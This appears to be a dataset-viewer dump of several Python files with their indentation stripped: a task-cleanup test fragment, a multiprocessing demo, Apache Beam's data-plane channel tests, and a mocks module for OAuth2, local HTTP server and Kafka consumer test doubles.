retry_codes = clean.backend_retry
retry = list(retry_codes)[0]
no_retry = max(retry_codes) + 1
i = 0
for use_row in (True, False):
for code in (0, CANNOT_SPAWN, OPS_KILLED, NO_OUTPUT):
t, r = tasks[i]
i += 1
print 'cleaning task: ', t.id, t.uuid, r
clean.request((t, r if use_row else None, code, None))
for use_row in (True, False):
for exec_code in (0, 1):
for backend_code in (0, retry, no_retry):
print i
t, r = tasks[i]
i += 1
print 'cleaning task: ', t.id, t.uuid, r
res = ExecutorResult(code=exec_code, backend_code=backend_code,
matches=[], crr='')
clean.request((t, r if use_row else None, 0, res))
_exit(0)
|
multiprocessing.py
|
import multiprocessing
import time
def action(a, b):
for i in range(30):
print(a, ' ', b)
time.sleep(0.1)
if __name__ == '__main__':
jc1 = multiprocessing.Process(target=action, args=('进程一', 0))
jc2 = multiprocessing.Process(target=action, args=('进程二', 1))
jc1.start()
jc2.start()
jc1.join()
jc2.join()
print('jc1,jc2任务都已执行完毕')
jc1.close()
jc2.close()
|
data_plane_test.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for apache_beam.runners.worker.data_plane."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import sys
import threading
import unittest
from concurrent import futures
import grpc
from future.utils import raise_
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker import data_plane
def timeout(timeout_secs):
def decorate(fn):
exc_info = []
def wrapper(*args, **kwargs):
def call_fn():
try:
fn(*args, **kwargs)
except: # pylint: disable=bare-except
exc_info[:] = sys.exc_info()
thread = threading.Thread(target=call_fn)
thread.daemon = True
thread.start()
thread.join(timeout_secs)
if exc_info:
t, v, tb = exc_info # pylint: disable=unbalanced-tuple-unpacking
raise_(t, v, tb)
assert not thread.is_alive(), 'timed out after %s seconds' % timeout_secs
return wrapper
return decorate
class DataChannelTest(unittest.TestCase):
@timeout(5)
def test_grpc_data_channel(self):
data_channel_service = data_plane.GrpcServerDataChannel()
server = grpc.server(futures.ThreadPoolExecutor(max_workers=2))
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
data_channel_service, server)
test_port = server.add_insecure_port('[::]:0')
server.start()
data_channel_stub = beam_fn_api_pb2_grpc.BeamFnDataStub(
grpc.insecure_channel('localhost:%s' % test_port))
data_channel_client = data_plane.GrpcClientDataChannel(data_channel_stub)
try:
self._data_channel_test(data_channel_service, data_channel_client)
finally:
data_channel_client.close()
data_channel_service.close()
data_channel_client.wait()
data_channel_service.wait()
def test_in_memory_data_channel(self):
channel = data_plane.InMemoryDataChannel()
self._data_channel_test(channel, channel.inverse())
def _data_channel_test(self, server, client):
self._data_channel_test_one_direction(server, client)
self._data_channel_test_one_direction(client, server)
def _data_channel_test_one_direction(self, from_channel, to_channel):
def send(instruction_id, target, data):
stream = from_channel.output_stream(instruction_id, target)
stream.write(data)
stream.close()
target_1 = beam_fn_api_pb2.Target(
primitive_transform_reference='1',
name='out')
target_2 = beam_fn_api_pb2.Target(
primitive_transform_reference='2',
name='out')
# Single write.
send('0', target_1, 'abc')
self.assertEqual(
list(to_channel.input_elements('0', [target_1])),
[beam_fn_api_pb2.Elements.Data(
instruction_reference='0',
target=target_1,
data='abc')])
# Multiple interleaved writes to multiple instructions.
target_2 = beam_fn_api_pb2.Target(
primitive_transform_reference='2',
name='out')
send('1', target_1, 'abc')
send('2', target_1, 'def')
self.assertEqual(
list(to_channel.input_elements('1', [target_1])),
[beam_fn_api_pb2.Elements.Data(
instruction_reference='1',
target=target_1,
data='abc')])
send('2', target_2, 'ghi')
self.assertEqual(
list(to_channel.input_elements('2', [target_1, target_2])),
[beam_fn_api_pb2.Elements.Data(
instruction_reference='2',
target=target_1,
data='def'),
beam_fn_api_pb2.Elements.Data(
instruction_reference='2',
target=target_2,
data='ghi')])
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
|
mocks.py
|
# Copyright (c) 2017-2018 CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE
# AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Module with utlities to be used in unit tests
"""
import json
import re
import socket
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
from unittest.mock import MagicMock, Mock
import requests
from django.utils.crypto import get_random_string
from kafka.structs import TopicPartition
class MockOAuth2Session(MagicMock):
RESPONSES = []
RAISES = None
def __init__(self, *args, **kwargs):
super(MockOAuth2Session, self).__init__(*args, **kwargs)
self.token = None
self.fetch_token = Mock(side_effect=self._fetch_token)
self.get = Mock(side_effect=self._request)
self.post = Mock(side_effect=self._request)
self._get_counter = 0
def _fetch_token(self, **kwargs):
if self.RAISES is None:
self.token = {
'access_token': get_random_string(30),
'token_type': 'Bearer',
'expires_in': 36000,
'expires_at': time.time() + 36000,
'scope': ['read', 'write']
}
return self.token
else:
raise self.RAISES()
def _request(self, url, *args, **kwargs):
res = self.RESPONSES[self._get_counter % len(self.RESPONSES)]
self._get_counter += 1
if isinstance(res, Exception):
raise res
else:
response = Mock()
response.status_code = res
return response
class MockMessage(object):
def __init__(self, topic, value, offset, key=None, headers=None):
self.key = key
self.topic = topic
self.value = value
self.offset = offset
self.headers = headers if headers is not None else []
class MockRequestHandler(BaseHTTPRequestHandler):
OAUTH2_PATTERN = re.compile(r'/oauth2/token/')
OAUTH2_TOKEN = 'OUfprCnmdJbhYAIk8rGMex4UBLXyf3'
def _handle_oauth(self):
payload = {'access_token': self.OAUTH2_TOKEN,
'token_type': 'Bearer',
'expires_in': 1800,
'expires_at': time.time() + 1800,
'scope': ['read', 'write']}
status_code = 201
return payload, status_code
def do_POST(self):
if re.search(self.OAUTH2_PATTERN, self.path):
payload, status_code = self._handle_oauth()
self._send_response(payload, status_code)
return True
return False
def _path_match(self, path):
return re.search(path, self.path)
def _send_response(self, payload, status_code=requests.codes.ok):
self.send_response(status_code)
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
response = json.dumps(payload)
self.wfile.write(response.encode('utf-8'))
def _content_data(self):
length = int(self.headers['content-length'])
return self.rfile.read(length).decode('utf-8')
def _json_data(self):
return json.loads(self._content_data())
def do_GET(self):
raise NotImplementedError
def log_message(self, *args, **kwargs): pass
class MockKafkaConsumer(object):
"""
Simulates a KafkaConsumer
"""
MESSAGES = []
FIRST = 0
END = 1
def __init__(self, *args, **kwargs):
super(MockKafkaConsumer, self).__init__()
self.counter = 0
def subscribe(self, topics):
self.topics = topics
def assignment(self):
return set([TopicPartition(topic, 0) for topic in self.topics])
def beginning_offsets(self, topics_partition):
return {topics_partition[0]: self.FIRST}
def end_offsets(self, topics_partition):
return {topics_partition[0]: self.END}
def seek(self, topics_partition, index):
self.counter = index
def __getattr__(self, item):
return MagicMock()
def __iter__(self):
return self
def next(self):
return self.__next__()
def __next__(self):
try:
m = self.MESSAGES[self.counter]
except KeyError:
raise StopIteration
else:
self.counter += 1
return m
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
def start_mock_server(certs_dir, cls, port=None):
port = port or get_free_port()
mock_server = HTTPServer(('localhost', port), cls)
mock_server_thread = Thread(target=mock_server.serve_forever)
mock_server_thread.setDaemon(True)
mock_server_thread.start()
return mock_server_thread, mock_server
def stop_mock_server(mock_server_thread, mock_server):
mock_server.shutdown()
mock_server_thread.join()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.